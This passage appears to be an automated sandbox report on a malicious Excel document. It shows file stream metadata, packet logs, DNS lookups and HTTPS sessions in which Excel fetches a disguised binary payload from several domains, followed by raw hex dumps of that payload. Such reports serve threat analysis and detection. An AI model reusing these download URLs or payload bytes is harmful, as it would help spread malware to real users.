                                                                                                                                                                                              Shared Document:False
                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:1048576

                                                                                                                                                                                              Streams

                                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.419621160955
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.275408622527
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 238868
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:238868
                                                                                                                                                                                              Entropy:7.53398047476
                                                                                                                                                                                              Base64 Encoded:True

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              Sep 29, 2021 23:45:40.715348959 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.715396881 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.715411901 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.715456009 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.790704012 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.790834904 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.790865898 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.790925026 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.947875977 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948003054 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948031902 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948072910 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948092937 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948139906 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948256969 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948344946 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948364019 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948493004 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948568106 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948651075 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948672056 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.948734045 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.978956938 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.979072094 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.979494095 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:40.979515076 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:40.979571104 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.190315008 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.190344095 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.190496922 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.190856934 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.190898895 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191051006 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191159010 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191310883 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191329002 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191482067 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191489935 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191513062 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191598892 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191689014 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191703081 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191787958 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191826105 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191976070 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.191994905 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192106962 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192194939 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192332029 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192348957 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192436934 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192471027 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192605019 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192621946 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192718029 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.192848921 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193018913 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193038940 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193095922 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193161964 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193185091 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193269014 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193377018 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193504095 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193681002 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193698883 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.193805933 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.218668938 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.218861103 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.218868971 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.218900919 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.218974113 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.219053030 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.219070911 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.219142914 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264555931 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264727116 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264755964 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264786959 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264853954 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.264909029 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431543112 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431761980 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431799889 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431889057 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431904078 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431926966 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.431994915 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432070971 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432087898 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432163000 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432192087 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432213068 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432262897 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432323933 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432343960 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432364941 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432430983 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432492971 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432590008 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432717085 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432732105 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432811022 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432816029 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432838917 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432898045 CEST49738443192.168.2.3162.251.80.22
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432970047 CEST44349738162.251.80.22192.168.2.3
                                                                                                                                                                                              Sep 29, 2021 23:45:41.432971954 CEST49738443192.168.2.3162.251.80.22

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP

                                                                                                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 29, 2021 23:45:37.705020905 CEST | 192.168.2.3 | 8.8.8.8 | 0x2059 | Standard query (0) | gillcart.com | A (IP address) | IN (0x0001)
Sep 29, 2021 23:45:39.362862110 CEST | 192.168.2.3 | 8.8.8.8 | 0x16a | Standard query (0) | geit.in | A (IP address) | IN (0x0001)
Sep 29, 2021 23:45:41.725260019 CEST | 192.168.2.3 | 8.8.8.8 | 0xca2c | Standard query (0) | mercanets.com | A (IP address) | IN (0x0001)

                                                                                                                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 29, 2021 23:45:37.819569111 CEST | 8.8.8.8 | 192.168.2.3 | 0x2059 | No error (0) | gillcart.com | | 199.79.63.251 | A (IP address) | IN (0x0001)
Sep 29, 2021 23:45:39.481199980 CEST | 8.8.8.8 | 192.168.2.3 | 0x16a | No error (0) | geit.in | | 162.251.80.22 | A (IP address) | IN (0x0001)
Sep 29, 2021 23:45:41.963067055 CEST | 8.8.8.8 | 192.168.2.3 | 0xca2c | No error (0) | mercanets.com | | 162.222.225.250 | A (IP address) | IN (0x0001)

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • gillcart.com
                                                                                                                                                                                              • geit.in
                                                                                                                                                                                              • mercanets.com

                                                                                                                                                                                              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 199.79.63.251 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
2021-09-29 21:45:38 UTC | 0 | OUT | GET /Cdpmoyhr/key.xml HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                              Host: gillcart.com
                                                                                                                                                                                              Connection: Keep-Alive
2021-09-29 21:45:39 UTC | 0 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Wed, 29 Sep 2021 21:45:38 GMT
                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Content-Type: text/html;charset=utf-8
2021-09-29 21:45:39 UTC | 0 | IN | Data Ascii: 3e82<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="X-UA-Compatible" content="ie=edge"><meta name="viewport" con
2021-09-29 21:45:39 UTC | 8 | IN | Data Ascii: l class="categories_mega_menu


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49738 | 162.251.80.22 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
2021-09-29 21:45:39 UTC | 8 | OUT | GET /MeOlE9Xxd/key.xml HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                              Host: geit.in
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2021-09-29 21:45:40 UTC8INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 29 Sep 2021 21:45:40 GMT
                                                                                                                                                                                              Server: nginx/1.19.5
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 468910
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Server-Cache: true
                                                                                                                                                                                              X-Proxy-Cache: HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Data Ascii: MHDL;HlPWPuLHVtHH\`LHIDNt$_H]'Ht0XH8HWD;;SH2H$tP\$tHR|=@6=[HE\HH3HxHLH$]HAEHH0(
                                                                                                                                                                                              2021-09-29 21:45:41 UTC216INData Raw: ea c9 df 3b 70 17 48 00 ec cc 30 0d 48 8b 48 c4 01 30 54 cb 07 8b 0c 5c 4f 89 00 4a ff cc 28 23 c4 e8 48 48 90 00 cc 15 41 27 8b 00 44 f7 85 85 d9 74 48 cb fd 4d 89 48 00 1d f0 85 24 ff e0 c9 cc 48 28 48 ee 15 24 7f 00 b4 15 cc 48 03 ff 90 48 00 cc 8b 7b 24 30 65 bf 89 d0 f0 00 b8 cc 75 48 75 48 8d 1f 30 48 44 20 8b af 89 33 49 39 44 e0 f6 89 4c 58 30 8b 8d a0 48 03 54 60 90 eb 48 c0 00 0f 48 16 c7 27 00 24 48 89 48 00 e7 08 cf 04 48 40 05 00 e8 a1 8b 89 ff 8d 10 12 00 d2 c0 13 ee ac 50 48 ff 00 5e e8 24 33 cc 48 ff 15 8b 48 57 75 00 5e cc 49 10 8b 84 d2 23 48 ff 04 ff 48 00 f8 48 c6 b6 44 ff 48 00 0f 4d 75 a8 48 41 00 70 48 8b 4b 8b 8b 4d 15 4d 48 cc 83 00 28 48 48 a0 ff 0c cc 0c 48 1e ff 00 53 c3 55 48 cc 85 ec c6 48 e8 04 66 d1 0a e8 0c d7 c0 ec 48 4d
                                                                                                                                                                                              Data Ascii: ;pH0HH0T\OJ(#HHA'DtHMH$H(H$HH{$0euHuH0HD 3I9DLX0HT`HH'$HHH@PH^$3HHWu^I#HHHDHMuHApHKMMH(HHHSUHHfHM
                                                                                                                                                                                              2021-09-29 21:45:41 UTC224INData Raw: 00 00 24 0f c0 05 75 84 85 01 db 8b 60 03 89 e1 45 11 50 df 8d 24 48 74 00 30 15 cf 00 c7 15 48 2b 8d 4d 15 8b 89 89 00 4c 15 eb cc d7 83 d9 48 5d 44 c0 d9 00 0d 28 44 8b 8b 9b ff ff 8d 0a 8b 30 70 74 8d 40 fe 57 8b 48 c4 24 85 ff 2b 15 ff bc 15 15 05 ff e5 0c 8d 40 15 c0 89 cc 06 48 ff 8d 83 f4 00 8b 15 ec ff 48 08 5f 90 5c 03 21 8b cc 1b 8b 8d 48 8b 58 eb 00 00 5b 48 c8 5d 48 48 5f 8b 90 57 4f 15 d1 48 8d 48 50 00 10 24 ba 4c 8b ff 8b eb cc 48 18 24 24 da 15 2b 48 41 c0 20 ff ff 00 4c 48 15 00 c9 89 cc 48 8b 24 8c ff 8b 8b 85 15 00 48 f9 38 ff 00 62 48 8b ee 00 13 8b c8 08 54 02 ec 8b 5e 15 24 89 45 39 d8 0f 48 7d 40 4d 15 00 38 c9 00 60 48 8b 00 fe 60 2d c3 8b 00 32 00 1f 63 ff ee 06 00 5d 37 4b e8 83 0f 48 e8 31 3d 4b 1c d9 23 7f 40 4f 0f 8b ec e5 89
                                                                                                                                                                                              Data Ascii: $u`EP$Ht0H+MLH]D(D0pt@WH$+@HH_\!HX[H]HH_WOHHP$LH$$+HA LHH$H8bHT^$E9H}@M8`H`-2c]7KH1=K#@O
                                                                                                                                                                                              2021-09-29 21:45:41 UTC232INData Raw: fe 0d f3 83 00 2f ff 2e e0 48 24 48 5e 9c 00 48 7e 07 01 45 c0 00 30 c0 d2 cc 24 02 5e 48 cb cc 28 48 70 60 6c 18 48 48 00 75 89 83 8d 48 b7 2d 20 49 18 06 83 48 84 b3 1d 30 4c ff 9d f2 40 8b cc 00 00 83 f7 33 13 8b 90 10 67 8b 24 48 15 cc 47 15 15 0e 24 a6 ff 00 48 89 20 bb 8d fc ff 24 58 cc 9a 89 0f 48 c3 0f cc 48 da 18 77 24 ee 10 4c 8d c3 90 85 30 00 00 1c 8b 8b 08 8b ff 48 00 48 00 00 c0 f8 00 08 ff 15 8b 85 55 6e c8 b6 15 e3 cc 4c 53 20 cd ff 00 e9 c4 48 09 50 30 48 84 48 48 8b 8b 28 44 8d 83 4c 48 45 32 48 dc ff df ff 78 ff 49 00 90 16 00 15 0f 8d 90 0f ff 8b 85 13 74 24 4d 60 20 cc b7 cc 8d 8d 8b 21 74 45 b3 24 44 ba 48 fc 78 d2 21 ff 13 cc 00 48 8b 75 40 30 b1 89 89 fa 08 4d 48 0f 02 cc 92 53 cc 8b 40 00 20 c9 27 43 ff cf 5f c7 01 00 f6 6c cc 00
                                                                                                                                                                                              Data Ascii: /.H$H^H~E0$^H(Hp`lHHuH- IH0L@3g$HG$H $XHHw$L0HHUnLS HP0HHH(DLHE2HxIt$M` !tE$DHx!Hu@0MHS@ 'C_l
                                                                                                                                                                                              2021-09-29 21:45:41 UTC240INData Raw: 48 48 5e e8 44 cf 00 8d 01 01 89 8d 05 83 48 00 4c 28 8d 30 00 15 8b 01 85 00 4c 00 66 0e 45 8b 00 89 e8 49 6f 8b e8 48 48 00 ff 09 0f 24 47 4c 1b ff cc e9 41 93 15 8d 48 71 08 18 8b 01 50 1f 04 a9 e8 89 48 ed cc 83 f2 8b ec 48 20 0f 24 28 24 00 8b 48 48 18 48 45 28 cc 4d b9 8d 74 fa ff 50 24 5f 2f d0 8b 00 54 44 7c ff 00 cc 83 ff 0a 00 75 0f 8b 20 00 c3 0f 0f 27 01 14 8d 00 05 e8 07 24 f8 4d f6 ff 00 da 0f 00 24 b9 ff 5b 8b 8b 00 e4 5c ff 48 8d 8b c7 00 83 c0 85 6e 05 5c c7 48 f3 22 c7 ca 23 48 08 40 48 ff 4d 48 71 00 83 cc 01 48 cc 25 f0 d7 ff 48 8c 4d e2 75 cf 24 85 ff f1 67 9b 44 24 48 ff 00 45 48 00 c7 48 48 cc 83 8b 28 3e 74 24 48 54 c7 cc 5f 80 18 53 48 be 03 48 5f 58 7b 02 89 cc 20 0c 08 30 4b 45 2f 48 48 cc ff 48 10 c6 8b 8b ff cc fc 8d 08 8b 15
                                                                                                                                                                                              Data Ascii: HH^DHL(0LfEIoHH$GLAHqPHH $($HHHE(MtP$_/TD|u '$M$[\Hn\H"#H@HMHqH%HMu$gD$HEHHH(>t$HT_SHH_X{ 0KE/HHH
                                                                                                                                                                                              2021-09-29 21:45:41 UTC248INData Raw: 60 04 24 0c ff 1a 3b 4d e8 f5 89 d9 75 83 88 0f 43 c3 10 00 ff 89 62 ff 8b ec 44 08 01 00 00 24 8b 8b 4e c0 48 74 0e 00 8b 24 4d bc 90 ff 05 4b 58 83 08 48 e9 00 24 53 cc 15 ff 3b 2a 5b b8 33 8b 0f 24 cc 21 c9 ff 01 59 8d 8b 48 dc cc 83 00 d8 7e 44 f8 9d ff 8d 01 ec 8b 36 04 48 48 00 ff dc 24 2a 48 c4 2b 33 48 11 8d 8b 4d cf 8b 48 8d 8b 8b 5c 8d 15 de 83 cc 48 c0 15 48 84 45 40 30 10 c3 41 ff 15 4d 48 24 41 ff 00 ff 24 8b 48 00 20 8b fd 83 00 85 00 2c 09 cc 4c 00 8d de 4c da 48 24 eb 5f 48 8b c0 8b 8b 20 07 c7 04 00 00 c2 48 ff 48 10 83 36 ff 45 00 f0 8b 1c ff db 90 48 ff e2 8b 48 cc cc eb 53 48 44 10 ff fe 70 24 5b 8d ff 48 00 8d 10 24 c6 08 15 df 07 68 05 ff 44 44 00 8b 24 f8 90 cc 17 8d 8b ec 83 90 85 e8 55 00 ed 24 18 4c d3 8d 20 48 48 48 74 83 49 48
                                                                                                                                                                                              Data Ascii: `$;MuCbD$NHt$MKXH$S;*[3$!YH~D6HH$*H+3HMH\HHE@0AMH$A$H ,LLH$_H HH6EHHSHDp$[H$hDD$U$L HHHtIH
                                                                                                                                                                                              2021-09-29 21:45:41 UTC256INData Raw: 00 1a 04 10 30 08 45 8d 4c 48 00 89 00 95 c7 ff 48 38 48 ff ec 48 24 8b 89 cc 48 48 ca fb 43 15 f7 00 48 c7 08 c0 03 c7 8d c1 00 78 83 87 00 ff 84 8d 8d 00 cc 48 48 48 8b 00 4d 05 2c e8 2e 8d d0 c7 16 10 13 28 89 00 88 d7 4b ff cc 57 49 44 85 cb 49 4c 1f 48 15 cc a1 8b 71 4d 04 ff ff 95 2b 83 48 4c 90 00 d0 15 cc 00 04 ff 00 15 89 60 ff c3 20 d7 8d eb 24 4c 89 50 f0 50 ff 4c 0c 8b 1d ff e8 fb 00 83 01 8b 0f 10 8d 00 cc bb 8b 42 2c 7f 48 84 4f 73 01 85 90 44 00 00 8b 90 fa ff 24 cc 15 48 ff 00 cc 8b 48 40 40 48 85 48 3a 40 57 90 ec c7 49 30 d2 33 48 cc 00 35 1e 44 09 15 ce 00 c3 30 8d 00 d3 00 cc 48 ff 3b c3 48 48 00 74 00 00 e8 48 1c e8 b9 fd e8 d8 24 48 00 48 cc 48 48 48 ff 8d f5 05 15 0b ff 1c 15 48 74 00 58 c0 5f e0 18 cc 30 8b ff 5f 8d 97 48 8b 38 40
                                                                                                                                                                                              Data Ascii: 0ELHH8HH$HHCHxHHHM,.(KWIDILHqM+HL` $LPPLB,HOsD$HH@@HH:@WI03H5D0H;HHtH$HHHHHHtX_0_H8@
                                                                                                                                                                                              2021-09-29 21:45:41 UTC264INData Raw: 0d ec 9e 06 10 75 02 eb 34 8b 55 fc 8b 45 f4 0f af 04 95 e8 9e 06 10 89 45 f4 8b 4d f4 83 e9 5b 2b 4d 08 66 89 0d 5c 9e 06 10 0f b7 15 5c 9e 06 10 3b 15 f4 9e 06 10 75 02 eb 02 eb b0 a1 e4 9e 06 10 83 e8 5b 2b 05 e4 9e 06 10 a2 58 9e 06 10 68 f8 aa 06 10 68 80 06 00 00 ff 15 1c 10 04 10 89 45 f4 0f b7 0d 5c 9e 06 10 39 4d f4 72 34 0f b7 15 5c 9e 06 10 6b d2 1e 8b 45 08 2b c2 89 45 f4 8b 0d 18 9f 06 10 0f af 4d 08 89 0d 18 9f 06 10 0f b7 15 5c 9e 06 10 6b d2 1e 8b 45 08 2b c2 89 45 f4 ff 35 8c 95 07 10 0f b6 0d 58 9e 06 10 8b 15 e4 9e 06 10 2b d1 03 15 e4 9e 06 10 88 15 58 9e 06 10 0f b7 05 5c 9e 06 10 8b 4d 08 8d 54 08 08 89 55 f4 5e 81 e9 d7 03 00 00 ff e6 c7 45 fc 22 00 00 00 eb 09 8b 45 fc 83 e8 02 89 45 fc 83 7d fc 03 7e 52 8b 4d 08 3b 0d 08 9f 06 10
                                                                                                                                                                                              Data Ascii: u4UEEM[+Mf\\;u[+XhhE\9Mr4\kE+EM\kE+E5X+X\MTU^E"EE}~RM;
                                                                                                                                                                                              2021-09-29 21:45:41 UTC272INData Raw: 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7
                                                                                                                                                                                              Data Ascii: )*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
